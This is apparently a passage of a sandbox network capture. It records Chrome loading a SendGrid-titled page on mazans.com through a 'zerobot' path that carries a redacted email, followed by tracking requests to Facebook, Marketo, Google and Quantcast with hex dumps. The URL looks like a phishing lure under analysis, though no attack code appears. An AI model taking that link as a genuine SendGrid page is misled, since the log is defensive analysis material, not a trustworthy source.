                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 13 Oct 2022 23:55:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-methods: GET
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                          ETag: "edccd7502a75ade3b500ac4cde53d109"
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 666eddda46892ed48d8d771b6142ac24.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-P2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: YLSU6uDyOYEx6PBN9C_RsacqfCtGli1ocz6CGIpn8Q8L5wpJSuezxA==
                                                                                                                                                                                                                                                                                                                                                                          Age: 1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC9594INData Raw: 2f 2a 0a 20 51 75 61 6e 74 63 61 73 74 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 74 61 67 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 32 2c 20 51 75 61 6e 74 63 61 73 74 20 43 6f 72 70 2e 0a 2a 2f 0a 27 75 73 65 20 73 74 72 69 63 74 27 3b 28 66 75 6e 63 74 69 6f 6e 28 61 2c 72 2c 70 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 65 3d 70 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 65 2e 68 72 65 66 3d 64 3b 72 65 74 75 72 6e 20 65 7d 2c 75 3d 5b 2f 5e 68 74 74 70 5b 73 5d 3f 3a 5c 2f 5c 2f 28 28 61 64 73 65 72 76 69 63 65 2e 67 6f 6f 67 6c 65 2e 2a 29 7c 28 5b 5e 5c 2f 5d 2a 66 6c 73 5c 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 5c 2e 6e 65 74 29 29 5c 2f 2e 2a 7e 6f 72 65 66 3d 28 3f 3c 75 72 6c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /* Quantcast measurement tag Copyright (c) 2008-2022, Quantcast Corp.*/'use strict';(function(a,r,p){var t=function(d){var e=p.createElement("a");e.href=d;return e},u=[/^http[s]?:\/\/((adservice.google.*)|([^\/]*fls\.doubleclick\.net))\/.*~oref=(?<url
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC266INData Raw: 2c 5b 5b 67 2c 22 65 71 22 2c 22 68 74 74 70 73 3a 2f 2f 73 65 6e 64 67 72 69 64 2e 63 6f 6d 2f 70 61 72 74 6e 65 72 73 2f 61 6d 61 7a 6f 6e 2d 77 65 62 2d 73 65 72 76 69 63 65 73 2f 22 5d 5d 5d 2c 5b 61 2c 6e 75 6c 6c 2c 5b 5b 62 2c 22 5f 66 70 2e 65 76 65 6e 74 2e 48 6f 6d 65 70 61 67 65 22 5d 5d 2c 5b 5b 67 2c 22 73 77 22 2c 22 68 74 74 70 73 3a 2f 2f 73 65 6e 64 67 72 69 64 2e 63 6f 6d 2f 3f 22 5d 5d 5d 2c 5b 61 2c 6e 75 6c 6c 2c 5b 5b 62 2c 22 5f 66 70 2e 65 76 65 6e 74 2e 4e 65 77 20 41 63 63 6f 75 6e 74 20 53 69 67 6e 20 55 70 22 5d 5d 2c 5b 5b 67 2c 22 73 77 22 2c 22 68 74 74 70 73 3a 2f 2f 73 69 67 6e 75 70 2e 73 65 6e 64 67 72 69 64 2e 63 6f 6d 2f 22 5d 5d 5d 5d 29 7d 29 28 22 70 2d 64 65 5f 46 36 71 56 55 70 39 62 75 67 22 2c 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ,[[g,"eq","https://sendgrid.com/partners/amazon-web-services/"]]],[a,null,[[b,"_fp.event.Homepage"]],[[g,"sw","https://sendgrid.com/?"]]],[a,null,[[b,"_fp.event.New Account Sign Up"]],[[g,"sw","https://signup.sendgrid.com/"]]]])})("p-de_F6qVUp9bug",window


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          101192.168.2.1749926157.240.253.354436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1022OUTGET /privacy_sandbox/pixel/register/trigger/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=FGET HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Attribution-Reporting-Eligible: not-navigation-source, trigger, event-source
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7436801836002410373", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7436801836002410373"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1697INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC78INData Raw: 34 33 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0a 49 44 41 54 78 9c 63 00 01 00 00 05 00 01 0d 0a 2d b4 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 43PNGIHDRIDATxc-IENDB`0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          102192.168.2.17499213.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          103192.168.2.1749917192.28.147.684436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC861OUTPOST /webevents/visitWebPage?_mchNc=1731515352683&_mchCn=&_mchId=294-TKB-300&_mchTk=_mch-mazans.com-1731515352683-23262&_mchHo=mazans.com&_mchPo=&_mchRu=%2FWEB-ID-6672849687924%2Fzerobot%2F&_mchPc=https%3A&_mchVr=163&_mchEcid=&_mchHa=&_mchRe=https%3A%2F%2Fsepedatua.com%2F&_mchQp=email%3DEMAIL_REDACTED HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: 294-tkb-300.mktoresp.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC241INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 2
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-Request-Id: 11b7a2e1-4158-4ebc-9169-ec961ac5ede9
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC2INData Raw: 4f 4b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: OK


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          104192.168.2.1749928142.250.186.984436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1221OUTGET /pagead/viewthroughconversion/923239173/?random=1731515353497&cv=11&fst=1731515353497&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: IDE=AHWqTUl6XMwevcOEXz2krleqPYAHH4TflIpCKu6RvSM14qDprc3DKmZnBHNGCmyA; expires=Fri, 13-Nov-2026 16:29:18 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC367INData Raw: 31 33 32 65 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 132e(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1378INData Raw: 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 64 3d 61 5b 62 5d 3b 69 66 28 64 26 26 64 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 64 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 20 76 61 72 20 6d 3d 6b 28 74 68 69 73 29 2c 70 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 28 22 78 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 2c 74 3d 7b 7d 2c 76 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 64 29 7b 69 66 28 21 64 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 64 3d 76 5b 62 5d 3b 69 66 28 64 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 64 3d 61 5b 64 5d 3b 72 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];re
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1378INData Raw: 2b 2b 29 69 66 28 4c 3d 4c 5b 4b 5b 4d 5d 5d 2c 4c 3d 3d 6e 75 6c 6c 29 7b 48 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 48 3d 4c 7d 76 61 72 20 4e 3d 48 26 26 48 5b 36 31 30 34 30 31 33 30 31 5d 3b 47 3d 4e 21 3d 6e 75 6c 6c 3f 4e 3a 21 31 3b 76 61 72 20 4f 2c 50 3d 7a 2e 6e 61 76 69 67 61 74 6f 72 3b 4f 3d 50 3f 50 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 7c 7c 6e 75 6c 6c 3a 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 51 28 61 29 7b 72 65 74 75 72 6e 20 47 3f 4f 3f 4f 2e 62 72 61 6e 64 73 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 62 72 61 6e 64 29 26 26 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 29 3a 21 31 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 29 7b 76 61 72 20 62 3b 61 3a 7b 69 66 28 62 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ++)if(L=L[K[M]],L==null){H=null;break a}H=L}var N=H&&H[610401301];G=N!=null?N:!1;var O,P=z.navigator;O=P?P.userAgentData||null:null;function Q(a){return G?O?O.brands.some(function(b){return(b=b.brand)&&b.indexOf(a)!=-1}):!1:!1}function R(a){var b;a:{if(b=
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1378INData Raw: 74 63 68 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 76 61 72 20 49 3d 77 28 4f 62 6a 65 63 74 2c 22 61 73 73 69 67 6e 22 29 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 2c 7b 7d 2c 46 29 3b 6e 26 26 28 6e 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 26 26 20 28 49 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 3d 6e 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 29 2c 6e 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 26 26 28 49 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 3d 6e 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 29 29 3b 74 72 79 7b 76 61 72 20 53 3d 43 2e 66 65 74 63 68 28 71 2c 49 29 3b 53 26 26 53 2e 63 61 74 63 68 28 42 29 3b 76 61 72 20 4a 3d 21 30 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 62 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: tch==="function"){var I=w(Object,"assign").call(Object,{},F);n&&(n.attributionReporting&& (I.attributionReporting=n.attributionReporting),n.browsingTopics&&(I.browsingTopics=n.browsingTopics));try{var S=C.fetch(q,I);S&&S.catch(B);var J=!0;break a}catch(ba
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC417INData Raw: 62 5c 78 33 64 36 34 5c 78 32 36 75 61 66 76 6c 5c 78 33 64 47 6f 6f 67 6c 65 25 32 35 32 30 43 68 72 6f 6d 65 25 33 42 31 31 37 2e 30 2e 35 39 33 38 2e 31 34 39 25 37 43 4e 6f 74 25 32 35 33 42 41 25 32 35 33 44 42 72 61 6e 64 25 33 42 38 2e 30 2e 30 2e 30 25 37 43 43 68 72 6f 6d 69 75 6d 25 33 42 31 31 37 2e 30 2e 35 39 33 38 2e 31 34 39 5c 78 32 36 75 61 6d 62 5c 78 33 64 30 5c 78 32 36 75 61 6d 5c 78 33 64 5c 78 32 36 75 61 70 5c 78 33 64 57 69 6e 64 6f 77 73 5c 78 32 36 75 61 70 76 5c 78 33 64 31 30 2e 30 2e 30 5c 78 32 36 75 61 77 5c 78 33 64 30 5c 78 32 36 66 6c 65 64 67 65 5c 78 33 64 31 5c 78 32 36 64 61 74 61 5c 78 33 64 61 64 73 5f 64 61 74 61 5f 72 65 64 61 63 74 69 6f 6e 25 33 44 66 61 6c 73 65 5c 78 32 36 72 66 6d 74 5c 78 33 64 33 5c 78 32
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: b\x3d64\x26uafvl\x3dGoogle%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149\x26uamb\x3d0\x26uam\x3d\x26uap\x3dWindows\x26uapv\x3d10.0.0\x26uaw\x3d0\x26fledge\x3d1\x26data\x3dads_data_redaction%3Dfalse\x26rfmt\x3d3\x2
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
